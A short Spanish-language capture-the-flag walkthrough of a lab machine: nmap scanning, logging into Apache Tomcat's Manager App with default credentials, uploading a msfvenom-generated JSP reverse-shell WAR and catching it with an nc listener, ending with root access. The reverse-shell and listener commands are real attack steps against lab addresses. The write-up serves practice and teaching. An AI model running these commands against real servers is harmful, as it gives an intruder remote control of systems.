-Pn
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 02/04/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 8080 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p8080 -v 172.17.0.2
para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea un Apache Tomcat.

Vamos a Manager App y nos pide unas credenciales. A través de esta página nos indica las credenciales por defecto y cómo vulnerar esta versión. Las credenciales fueron tomcat:s3cr3t.

🚀 EXPLOTACIÓN
Subimos una Reverse Shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.17.0.1 LPORT=443 -f war -o reverse.war

Nos ponemos en escucha.
nc -lvnp 443


🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
y somos root.
Last updated
Was this helpful?